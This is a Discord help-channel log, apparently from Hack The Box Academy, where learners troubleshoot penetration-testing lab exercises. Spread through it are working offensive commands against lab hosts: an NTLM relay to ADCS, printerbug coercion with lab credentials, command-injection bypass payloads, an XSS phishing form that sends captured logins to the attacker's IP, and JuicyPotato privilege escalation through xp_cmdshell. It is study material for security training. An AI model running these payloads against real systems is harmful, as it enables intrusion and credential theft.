Module: Shells & Payloads; Task: The Live Engagement. I am using the Parrot machine provided, but it keeps failing to access the website (port 80 and port 8080). I keep getting the "connection has timed out" issue. This is for Host-1 from the Footholding machine. I tried using Chrome and Firefox. Trying to investigate the issue seems to get the "connection to this site is not secure". I remember a while ago that some browsers were going to block connections to sites that are not using encryption (https). Could this be the issue? I can't complete this assignment if I can't access the website.
|| Yes I tried dc1 and dc2 but I have nothing ||
The answer is inside the picture + delete it 😄
(format: "/directory/names") 😄
There is an image on the page with IPs. After connecting to RDP, try to access the website using the Host-1 hostname IP, and make sure to port scan
I retried everything but still don't find it
y'know if you gonna use spoiler tags might as well take it to DMs
|| when I'm brute forcing w ""for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done "" It only shows me 3 sub ||
@quiet heart || I tried this for sub in $(cat /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.dev.inlanefreight.htb @10.129.92.82 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||
I also tried resetting the vm several times. Still the same result. My printerbug.py doesn't wanna work when I point it to my target.
You can DM me if you want
<@&861185840277487616> looks like the copy pasta has arrived in most of the channels.
In Password Attacks – PtT from Windows the task is to use John’s TGT to perform a Pass-the-Ticket attack and retrieve the flag from \\DC01.inlanefreight.htb\john. After several resets I only find john.txt (which is the answer to the next question) and Julio.txt in the Julio folder (not accepted). Where is the flag for the question: “Use John’s TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \\DC01.inlanefreight.htb\john”?
I'm assuming a connection issue/vpn config is getting me in the
information gathering > DNS zonetransfer
academy question set.
dig axfr @nsztm1.digi.ninja zonetransfer.me
works great
dig axfr @ns1.inlanefreight.com zonetransfer.me
fails
connection to [TargetDNS.IPADDRESS]:53 failed timedout
Using the openvpn file given in the lab. tried on parrot and home lab kali box.
What am I missing please and thank you
ns1.inlanefreight.com
aren't you attacking inlanefreight.htb?
also same response to
I'm having issues with the Password Attacks, Pass the Certificate admin question. I've seen posts here about how the tool in the section doesn't work for the adcs attack anymore as PKCS12 is deprecated and have been trying workarounds but none have yet to work. Does anyone have a simple workaround i can implement?
Hi, i need some help on the infogathering web edition module, vhost section. Im trying to brute force but no tool or command seems to work or give any output. Am i missing something?
The method worked just fine for me. No issues with deprecation
Try :
dir \\DC01.inlanefreight.htb\john
\c$\john isnt \john
Did you modify /etc/hosts?
No 😬
Depends on the tool
I used both gobuster and ffuf but i guess my main problem was not editing the hosts file
i done it exactly how was done in the module and got the error with ntlmrelay
Modify it and try again with gobuster or ffuf ..
With ffuf you need the -H "FUZZ.inlanefreight.htb"
And the url can either be inlanefreight.htb or the spawned ip
Thanks, cant believe i forgot that step
Alright lemme try
"Got the error" what error? And is that error addressed in the reading
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.129.95.150 as INLANEFREIGHT/DC01$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[-] Authenticating against http://10.129.95.150 as / FAILED
[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Not the error in the reading
commands: impacket-ntlmrelayx -t http://10.129.95.150/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication,
(kali㉿kali)-[~/Tools]
└─$ printerbug INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.178.63 10.10.15.166
[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.129.178.63
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked
Error is the openssl PKCS12 being deprecated since the module was written
Modified and yet nothing
Can you send the command you used?
gobuster vhost -u http://94.237.55.43:48282 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
You’re missing -H
@fathom pendant any ideas?
Replace the IP with the domain inlanefreight.htb and add --append-domain parameter
the solution to your problem is in the reading
i believe the oscrypto fix should also fix the pyopenssl issue
Now its saying "unable to connect to http://inlanefreight.htb, no such host"
inlanefreight.htb:port
Finally it worked
Thanks @quiet heart & @fathom pendant
Hey guys im from Czechia and in my life i can't find where to download the vpn config file to use ssh, can someone help me?
@rose lagoon don't provide direct solutions, keep that to dms (if requested)
installed oscrypto and get this: ─$ python3 gettgtpkinit.py -cert-pfx DC01$.pfx -dc-ip 10.129.234.174 'INLANEFREIGHT.LOCAL/dc01$' /tmp/dc.ccache
2025-09-12 15:50:19,989 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
~~~~^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
~~~~~^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 302, in amain
ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 49, in from_pfx
return myPKINIT.from_pfx_data(pfxdata, pfxpass, dh_params)
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 58, in from_pfx_data
privkey, cert, extra_certs = pkcs12.load_key_and_certificates(pfxdata, None)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^
ValueError: Invalid password or PKCS12 data
but it don't work that not the solution
Hello
hello i have a problem on the Active Directory Enumeration & Attacks
can you help me ?
What type of problem and which section?
This is a completely different issue, invalid pw or pkcs12 data. IIRC the way you get the ccache it provides a key to decrypt the ccache
i ll dm u
Here please
on the DCSync part
@quiet heart I tried what you said me but I don't find the sub in the footprint DNS
here is the task
Try connecting to MS01, not ATTACK01
@quiet heart
Restart the lab
module : PASSWORD ATTACKS
Credential Hunting in Network Traffic
Question :The packet capture contains cleartext credit card information. What is the number that was transmitted?
i cant figure this out, i tried the Pcredz, and tried going through the wireshark as well but no luck
With wireshark, there is a request containing credit card information try to find it
(you can use wireshark filter)
The skill assessment is not broken, you just have to do SQLi when you want to check the price
@swift dove please have you already finished the part of attacking the system? I’m stuck.
What's that got to do with modules
how do you guys run python2.7 ? I can't seem to find many simple tutorials on getting that to work. Despite that in modules there are exploits that drupalgeddon that require it so would be nice to practice
python2.7
yes I know the command I mean its not installed on pwnbox and not installed on my home lab,
sudo apt install python2.7
has no installation candidate 😄 pwnbox...
Can't exploit if I don't have EOL python versions ... mhm painful
GPT says:
pyenv local 2.7.18
export PATH="$HOME/.pyenv/bin:$PATH"
eval "$(pyenv init -)"
eval "$(pyenv virtualenv-init -)"
source ~/.bashrc
exec $SHELL
python2.7 --version
It worked
hi guys i am stuck in the footprinting module in the SNMP section. The last question to enumerate a custom script, i dont have any clue.
This actually did work haha! thank you
anyone?
Did you solve the question before the last?
yes
Hi. I'm having an issue with the identifier bot command. It says I should contact an Administrator or Moderator. Which channel is the right one to do this?
Run the same command, then search for the flag manually or using grep
@quiet heart but what i should look?
looks like you're identified, not sure what your issue is
I am not. I have an old account linked to this discord and I want to change it to my actual account
gotchu
next time direct message a mod/admin
instead of posting randomly in one of the channels
because it can easily get buried
I sent you a message weeks ago...
I have to contact someone else?
and that was weeks ago, where i can assume that if i wasn't busy or that you contacted someone else and got it resolved
Flag, it’s noticeable
@main ridge should be good now
@quiet heart i found but it's not working
Make sure there are no spaces before or after the flag
no space. but i have to run the .sh file or i need just the path?
You need to submit the flag, run the same command then search for the flag manually
@quiet heart thanks solved!
@charred ice Please do not post flags
I spoilered it. It wasn't even correct ig
Not to be rude, but it appeared fully visible to me and was only one character off. Best to avoid posting flags in any form and follow moderator direction. Regarding the exercise-- you're on the right track and very close to the answer, just double-check what character you missed when stitching it together. The correct format includes the usual HTB{...}.
@charred ice Do not post flags. Spoiler tag does nothing.
I didn't post flag this time. I just posted the file data
You did
no need to post flags or content from modules above tier0. just ask your question, anyone who has done the module can help without needing that additional info as they've seen it
What am I doing wrong here? Like I did split the string as it said. I can't understand how or why should I take HTB{} into account and why in general is wrong here
you never said which section you're on so it's hard to say
always include the module, section, and question
my guess is you're finding another flag entirely, or just not inputting it correctly
https://academy.hackthebox.com/module/41/section/519
3rd questions. Sorry for the thing
You've only done part of it. You need to unpack it as well.
Oh shit you were right. I was reading it a little wrong. Thanks for the help guys.
What about @frozen yew
Ask @storm elk
[-h] [-u USERNAME] [-p PASSLIST] [-px PROXYLIST] [--prune PRUNE] [--stats] [-nc] [-m MODE]
Its for instagram
Just dont understand some of this stuff
I can send a pic in dms
You must have stumbled into the wrong Discord server. This server is for Hack The Box, not Instagram.
Hacking instagram is illegal
Thanks sherlock
This is not a hacking instagram server. It's a server related to HTB's platforms.
Why didnt u name it that instead of hacking
It is named HackTheBox...
but that's enough of this, stay on topic. this channel is for discussion of the modules, no one here is going to help you with illegal shit.
Bro, create an HTB account and start learning, it's better than wasting time on this
Whats a htb account
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hello, Using Web Proxies --> Zap Scanner. ZAP doesn't show any critical RCEs or anything as it says it should in the module task
has anyone come across this error in the pass the certificate attack module?
i put the IP twice because if i dont impacket wont know the target.
hey, can someone give me a nudge in Windows Privilege Escalation(Miscellaneous Techniques)? i cant find anything, even after running winpeas - maybe im just missin it
You haven't specified a target domain for secretsdump to use. The syntax is in the help text for the command
@heavy mango
Interesting. Did you get a TGT ticket first?
yes. i have it, along with Jpinkmans
your -dc-ip is different in the two screenshots, are you using the right one?
@heavy mango i am using the second one after i saw my mistake
and you have the correct IP for DC01 in /etc/hosts?
What was it?
hello everyone, anyone knows how to do file upload attacks? i am stuck with blacklist filter, i dont really know where i am doing wrong
I'm new in this, what do you recommend me to start programming and hacking, thank you
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
anyone?
Hi guys, I’m going through the course. I’m at file upload attacks, whitelists. I’m having issues getting the php script to execute. I was able to upload it in several different ways, but I can’t get it to run. I got 404s, blank screens and an error complaining about the picture has errors
What question
Read about Reverse Double Extension
There are many PHP extensions , try changing the PHP extension with any of the PHP extensions list, the following steps are explained in the section
I read it, but I’m still stuck. I’m following the instructions
A nudge would be appreciated
I can’t get the code to execute at all
Have you heard about the description field 😄
got it! thanks alot<3
Try changing the PHP extension with any of the PHP extensions list
Got it already. Thanks !
@little shadow Please do not reveal content from modules above tier 0.
Sorry, I didn't know it wasn't allowed. Could I DM you about the question?
I'm busy sorry
Hello, I am doing the skill assessment on Web Fuzzing, but I don't know if I am doing something wrong or don't know in which format I should input the answer. The formulation is a bit confusing. It says:
What are all the sub-domains you can identify? (Only write the sub-domain name)
I did find multiple sub-domains, but which should be the format for multiple answers? I tried x, y,z and x y z and just x or just but it doesn't seem to be valid. So, at this point I don't know what is wrong? I also tried http://x.domain , x.domain just x, and other variations
x y z is the expected format
so like
www dev admin
Oh, yes it worked. It would be helpful to have an example in there like other modules have. Thank you!
#1234357888114364508 if you want to suggest something 😉
So I assume for extensions is the same format, but should it include . or not?
it's with .
I can't get the curl command to work on https://www.inlanefreight.com as part of one of the Linux fundamentals questions. I'm not looking for help in answering the question just help on why curl doesn't work. I made sure I was using the Pwnbox instance and not still ssh into the target machine so I must be missing something
Using pwnbox?
yes
That's why, if youre on a free account pwnbox has a lot of limitations
You can buy $5 worth of cubes to remove the restrictions (or use your own vm)
oh but it says too but I guess it doesn't mention anything about what style account works
I see, ok thank you!
Its just a restriction on free accounts
(Aka you spend $0)
But spending any amount of money on academy lifts pretty much all the pwnbox restrictions
Can I please get a pm for XPath - Blind Exploitation (CWEE)
Hi
guys i need help with footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
on the DNS part
I see the mistake I was making, thank you!
hello i have a little prob in the course in the Active Directory Enumeration & Attacks exactly on the privileged access section
Anyone can give me a nudge for password attacks skill assessments, || i've managed to find .pcap files inside ** shares, i've tried to extract the hash with john tools (pcap2john, wpapcap2john and any pcap related) none of them works either showing illegal instruction, not supported, or file has wrong size, also am i even in the right path?||
omg im so idiot i thought the files asking for a password instead its prompting my root password to open the files 😭
what's your prob
When i want to connect to the attack vm
With the htb-student:Academy_student_AD!
It returns
Permission denied
are you using xfreerdp?
Nah the attacker machine is a linux os not windows
hey can anyone help me in using crackmapexec module + 0 Use the service account you found to access the shared folder serviceaccount and read the flag. I can't seem to connect
guys i need help with footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
on the DNS part
module : password attack , Credential Hunting in Network Shares
One of the shares mendres has access to contains valid credentials of another domain user. What is their password?
i tried but the op of the tool Snaffler is too massive,
which section?
sorry, have you done? if not you can dm me
Module: Pivoting, Tunneling, and Port Forwarding
I am trying to perform a full TCP connect scan with Nmap after setting up dynamic port forwarding on port 9050.
I'm not getting the expected results, but I am able to connect via RDP.
Is there something wrong with my procedure or the command? Can someone help me?
is there a process if someone can contribute to htb academy?
Yeah if you get hired at HTB
😭
I'm not very familiar with proxychains as I always use Ligolo-ng.
I would advise that you do the same, it makes pivoting so easy & you won't face similar issues.
guys i need help with footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
on the DNS part
Hi there, im currently in this module "password attacks", and im trying to solve: Mount the BitLocker-encrypted VHD and enter the contents of flag.txt as your answer.
the thing is, when i try to mount the .vhd file, it doesnt create the /dev/loop0p2 partition
dont know how to solve it, i did some research and i saw that the minimum file size is 64MB, which makes me think the file is not to blame here
How do I send msgs in general😭😭
well, solved: had to do it on windows
The instructions are in #welcome
Oof
Hey all, I'm currently on Network Foundations module - Skills Assessment. I'm trying to follow the optional task called "Target Acquired".
Now the issue I get is when I'm connected to the FTP and in passive mode, and calculated the port number, I get "connection refused" error message instead of "open".
I followed the task to the letter, so I'm a bit confused what did I do wrong. Can anyone please help?
Is there a hacker that could help me? 😛
If it's related to modules
It Isnt😭
Then no
I can't seem to
Nope, this server isn't for that. Reach out to support on the website.
I tried to
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
i found ns.inlanefreight.htb and root.inlanefreight.htb
the answer is ns.inlanefreight.htb, why is it not root.inlanefreight.htb?
they both look like FQDNs to me
Anyone have experience with an error when trying to spawn target "Error - not enough permissions to create a genesis"
found the solution (Claude to the rescue :D)
What you need to do:
Keep your first terminal open with the FTP control connection (the one where you ran nc 10.129.233.197 21)
Before connecting to the data port, you need to send a command that requires data transfer. The most common one is LIST to list directory contents.
Here's the correct sequence:
In your first terminal (control connection):
USER anonymous^M
PASS anything^M
PASV^M
(You've done this part correctly)
Immediately after getting the PASV response, send:
LIST^M
Then quickly, in your second terminal:
nc -v 10.129.233.197 49674
The key points are:
The data port is only opened when the server expects a data transfer
You have a limited time window to connect after sending the LIST command
The connection to the data port should happen almost immediately after sending LIST
Hi, everyone. I want to know why in HTB lab I completed the task 1. Suppose the task 2 will be unlocked, but I completed task 1 and submitted, the task 2 is still locked? Why?
What module is this for?
Just the Tier 0 ,Meow lab
I just finished that part, you need to enum the subdomain with another wordlist, I rmb something fierce, look for it 🙂
Yeah I got it already, but thank you so much for having the time to reply to my message😇
I can't figure this out either. But when I use my own VM instead of the pwnbox, everything works just fine. Like what r0GLITCH said, just use ligolo lol.
Can anyone help me with Ai red teaming ctf going on live. I am struggling with last challenge
Unfortunately, we cannot offer any assistance for active CTFs.
Okayy
Hi everyone. Please could someone help me for this part of module AI red teaming
Ai Red Teaming -> Attacking AI - Application and System -> Attacking the system
https://academy.hackthebox.com/module/315/section/3770
Is there a way to cancel and re try the target spawn?
I think mine got stuck, it has been 5 minutes and still spawning
Sometimes changing regions can help @lapis whale or just waiting
Seems to have kicked up now :D, thanks for the prompt response though 😉
Some just take a while to fully spawn
Hello guys im new here and i wanna be professional in network what do u suggest and what should i do in this server ?
Regarding the blacklist filter, can i DM?
can i DM you? i am following all the steps, all results are coming back as 200 in intruder
try dig dc1.internal.inlanefreight.htb @ip
When you directly query the A (or any other record) the server answers based on the allow-query option. In your example it makes sense to prevent lookups from an external endpoint to an internal subdomain. The axfr answer is based on the allow-transfer option and is obviously misconfigured here. Both default to any client.
you forgot the @ in front of the IP and now get NXDOMAIN instead of REFUSED
oh i see
that makes sense
root.inlanefreight.htb is a valid FQDN, but it’s just another host in the zone and not the one that identifies the DNS service’s IP.
hello i want to remove my billing options but i cannot as i forgot my old paypal creds can you remove it for me? if you can i have to do it today if possible
@sacred rock
Don't tag staff like that. You need to contact support.
Need some help? Learn how to reach the support team on Academy.
ooh sorry i didnt know, support will be only available on Mondays 😭
i have to do it today
when you guys go through the modules, do you ya'll take extensive notes on the technical stuff or just on the commands with a short description?
Hello im trying to do advanced SQL injection skills assessment but I can't even get the source code, I keep getting access denied??
scp -r student@10.129.162.182:/opt/Pass2-1.0.3-SNAPSHOT.jar ./
The authenticity of host '10.129.162.182 (10.129.162.182)' can't be established.
ED25519 key fingerprint is SHA256:0RhCtT2MFrH2W8dgUHOrUktMt33E3zeFyi+wZVYPqNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.162.182' (ED25519) to the list of known hosts.
student@10.129.162.182's password: academy.hackthebox.com
Permission denied, please try again.
can anyone help?
Hello, where can I ask for help/advice on HTB Labs?
Depends, on the lab first you'll need to verify your account (read #welcome)
Channels:
~~Anyone that can help on DACL II Skills assessment Q3?
I know what I need to do, but I am getting skilled issued trying to execute it.~~
Nvm dug myself out
You forgot the @
Gm what are the ssh creds of ACADEMY-EA-ATTACK01 on the Active Directory Enumeration & Attacks
any help please
Haven't done this module, but aren't you supposed to provide a username and password with Powershell, and for that we need to create a PSCredential object
They did not provide a password, only a hash, so I used it to ask for a TGT using Rubeus and imported the ticket with ptt /ticket: flag.
Hello does anybody know how to hack I need help with a situation im in
Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercise:
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )
Guys who can help me on Active Directory Enumeration & Attacks
Exactly what are the creds if the ssh session of the attacker vm
I tried htb-student:Academy_student_AD!
Nd it didn’t work
Think about brute forcing
Which section?
Send the link
ah sorry Privileged Access
what are the creds of this vm
HTB does this from time to time.
You can probably find his credentials in the lesson itself.
Sometimes they mention the credentials once and re-use it across other sections within the same module.
You will find it in the section, under scenario
thanks @quiet heart
No one can help you with that here
Does anybody know if the AI Red Teamer Path will get a certification? It's been a while since I see it on the 'Job Role Paths' but still no cert
Hi guys, can anyone give me a hand in:
INJECTION ATTACKS, XPath - Blind Exploitation
I was able to find the users, but the password returns none
nvm found the bug in my code
Can I take the "Hacking Wordpress" module or is it being phased out due to the transition from CBBH --> CWES
I don't want to go halfway through something and it get yeeted.
The module will remain in the Academy. If I remember correctly, it is in the CJCA path.
Hello - I'm having issues with the CRACKMAPEXEC module 84 section 1747 (Skills assessment)
I am connected via chisel - but no matter what I try I cannot get any connection to the internal host to enumerate users. The question is: " What's the password of the account you found?"
It looks to be connection issue related - i cant scan the machine at all.
Type the command you used so it can be corrected
Have you tried visiting the site in your browser.
Add the IP of inlanefreight/the target to your /etc/hosts?
Otherwise curl it by its IP.
Np
Using the guided solution also not working
Have you tried ligolo-ng?
you cant here, the agent is prerunning from chisel
Web Proxies Skill Assessment 2nd question. I used CyberChef to get the value but how would one find which encoding was used manually
Can I please get a pm for XPath - Blind Exploitation (CWEE)
Same issue
you guys getting VPN issues ? got a DNS style output in my openvpn window. Might change vpns
seem to be getting the same on EU-VPN 5. Mhm can't connect to labs atm, something going on ?
Seems that my VM was just having a paddy. All good now
Can someone please help me? I was doing the Windows Command Line Introduction Module skill assessment and the task is "Access the host as user1 and read the contents of the file "flag.txt" located on the user's desktop." But when I try to connect via RDP (using this command: xfreerdp /v:10.129.153.38 /u:user1 /p:'.........') I get this error:
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - CN = ACADEMY-ICL11.greenhorn.corp
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - freerdp_post_connect failed
And I don't know how to solve it
@rare mirage careful not to spoil content of modules above Tier 0
they dont like that...
However ive just taken a look and you're connecting with xfreerdp but the method it wants you to connect with is ssh.
sorry it was unintentional
All good, use the password you had in that message above (see you censored it now :)) in the ssh connection and you should be able to get the flag from there
re above
ok thank you very much
Hey, maybe I'm just stupid, but in the skills assessment in the hacking WordPress module, the target IP is simply not a WordPress website. It's probably just me, but I'm stuck. The previous part of the module went perfectly. Can anybody help me?
hey n9t1m, if I remember correctly it is a wp site but it sits on a vHost so you'll need to add it to /etc/hosts. Have you done this already ?
What's V host short for?
Virtual Host
So why aren't they reachable normally via DNS resolver instead of having to add it to /etc/hosts
You can use ffuf or gobuster to find some vhost (or other tools), just need a wordlist, from SecLists for example, and the URL of the target.
To popularize what a vhost is, it is a subdomain.
vHosts are subdomains that when put into hosts file you're able to resolve, without it you're sent to the IP of the site which may not be hosting the website or even the remote DNS server may not have a record of the domain, the benefit of vhosts is they allow you to host multiple apps off of one host / sharing the resources of the server. So putting into /etc/hosts you'll be able to resolve the domain locally by specifying the IP it can be reached at.
I'm sure others will have better descriptions but thats my understanding
gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q --append-domain this command saved my butt a few times going through the modules towards end of CPTS. vHost enumeration (after placing the lab ip into the /etc/hosts with inlanefreight.local)
Hello guys, in the documentation and reporting module, and for the second question in the "Notetaking and Organization" section, basically asking how to do a vertical pane split in tmux, I'm having an issue with the formatting of the answer. I don't want to post the answer here since its a tier 2. I just need help with the formatting if someone is able to help.
Thank you!
The answer is in the section. All you have to do is copy and paste it without making any modifications to it, without ()
Can someone explain me the usage of rpcclient $> enumdomains?
Just finds existing domains
whats the meaning of domains in the smb environment?
Wym? No Active Directory?
im in the Footprinting module - SMB section
I dont know what Active Directory is
if theres no AD then it will probably be enumerating the workgroups
i can't understand what you are telling me, sorry but im a newbie
this is the example in the section
they explain what a workgroup is in the samba section
Its different groups and domains
Builtin refers to the "Builtin" or native stuff
I have a question: If you go through the Academy. Can you learn how to go through CTF ? A complete beginner. Basically, I’m just curious if it’s worth going through the Academy and all other modules be enough for a beginner to be able to compete in CTF?
The skills gained in academy go beyond ctf skills, but yeah you can use them in ctfs
Module Name: Linux Fundamentals
Section Name: Filter Contents
Question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
My current attempt does look like this: curl -Ls https://www.inlanefreight.com | grep 'https://www.inlanefreight.com' | sort -u | grep -o '/' | wc -l
I have no idea how to count all unique paths. I appreciate any help...
Your attacker box can't reach the Internet. Weird it's trying over IPv6.
Have you fixed your networking issue? 😄
You think so? The thing is, I don’t want to be in cybersecurity or anything like that. I just would love to be able to navigate around the CTF events. You think the Academy will allow me to do so?
yeah
Thank you
hey please I have problem with the flag in model deployment tampering. Were you able to read having the flag?
for me i have
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}
Can someone help me? I'm in the Windows command line module skill assessment and I'm in task 10 where the objective is to find the user with the most failed logon attempts and I can't find him. I'm using this code and it's still failing.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625} | Group-Object {$_.Properties[5].value} | Select-Object Count,Name | Sort-Object Count -Descending
I think you need to use the command Up Down Up Down Left Right Left Right A B Select Start
I got some questions and i need help if someone really advanced can help me lmk.
(only really advanced people tho)
Just ask your module related question here.
@patent remnant
Please don't just randomly ping people
Hey guys, I'm new to hack the box and I would like to learn. Can somebody tell me what I should do, because I'm like 0% in this and I hope I get good advice 👍
Hi
Check out this blog post. Here you can learn the first steps.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Should I do CJCA or SOC path first if I already graduated college and have a beginner-intermediate knowledge
Bet ty
Cause I’ve done CTFS already and did like Tryhackme and wanna level up
hi @fathom pendant on migration to CWES cert does the modules we have now on the list due to change? or what ?
Theres the announcement in #academy-announcements that explains the gist
Hello, everyone. I need help with the module Active Directory Enumeration & Attacks, at section AD Enumeration & Attacks - Skills Assessment Part II, question: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I transfer ||juicypotato|| to SQL01 via ||xp_cmdshell|| and I use the command ||xp_cmdshell C:\Temp\JuicyPotato.exe -l 18000 -p C:\Temp\shell.exe -t * -c return|| COM -> recv failed with error: 10038. I also tried other CLSIDs, it still returns the same result. Please give me some suggestions.
finally, I use printspoof to get system
did you run GetCLSID.ps1 as well ? use the last CLSID from that output. If it still doesn't work you might consider switching to another well known exploit for that version of windows server.
you can DM me @eager spindle if a nudge is needed
Windows Lateral Movement, SA, Question 5, how do we get connectivity from the WSUS server back to attack host to upload files ? Solution downloads the files from the external IP of attacker machine but clearly that cant be since the WSUS server doesnt have a network interface with an external IP. Ligolo listener also doesnt work cause firewall is blocking unused connections as stated, so whats left ?
Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercice :
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )
Hey im stuck at the first assessment in linux privilege escalation how can i get the flag ive enumerate every file but i couldnt get it
Do staff always do the cube talk every Fridays at 12AM EST?
i havent done that module but you can dm me
Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?
anyone help on this ?
I feel stupid. Thank you so much!
hey, can someone give me a hint in Windows Privilege Escalation Skills Assessment - Part I for the second question - Find the password for the ldapadmin account somewhere on the system.?
im already nt authority\system btw
.
in module XSS, section phishing, the send.php does not respond and I get the message "issus in url vailed". What is the problem?
my payload is :
http://10.129.141.139/phishing/index.php?url='onerror="document.getElementById('urlform').remove();"><HTML ONpOIntEREntER= a = document.write('<h1><h1>Please login to continue</h1><form action=http://my_IP:80><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><!--
anyone getting any error or so waste time in response ??
Hi I have a simple question. How can I share my progress with my student id ? Do we have like an API's URL ?
hello! I'm currently doing the AEN module and i have a few questions about reporting specifically in the exploited hosts appendix. my question is, when writing an entry in the appendix do you include even the hosts not used in the exploit chain to full domain compromise? for example if an exploit led to an RCE on a host not in scope, would you still add it to the appendix? or is it intended for all and every exploit you find?
this image is taken from a sample report hosted by htb.
<@&861185840277487616>
the sample report is still from a module above tier 0.
are you sure?
Which module did you take the sample from ?
but to answer: exploited host just means any host you exploited
doesn't necessarily mean the chain. Exploited hosts won't necessarily have to appear in your detailed attack chain
okay thank you, i should've added more context to the source.
BTW, Should I list only the hosts where I actually gained a foothold or full compromise, and exclude web vulnerabilities that didn’t let me get a foothold?
Hi all,
I am currently stuck on the LLM Output Attacks Skill Assessment. I managed to obtain two sets of keys from Imagebot, but they don’t seem to have much use. None of my injection attempts have worked so far, and most of them are blocked. Additionally, I was able to change my logged-in user role, but still no luck. Any hints? Thanks!
any exploitation
Hey. I am currently stuck. Can I DM you?
@storm elk can I DM you?
Sure
In Active Directory LDAP - Skills Assessment the last question is "What non-default privilege does the htb-student user have?" whoami /priv doesn't return the right answer. Any hints?
